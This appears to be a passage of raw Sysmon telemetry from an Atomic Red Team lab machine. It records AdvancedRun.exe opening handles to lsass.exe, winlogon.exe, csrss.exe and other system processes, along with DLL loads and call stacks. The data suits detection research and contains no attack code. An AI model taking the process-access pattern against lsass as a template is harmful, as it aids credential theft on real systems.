10341000x80000000000000003983010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003982998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003982995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003982994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003982992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 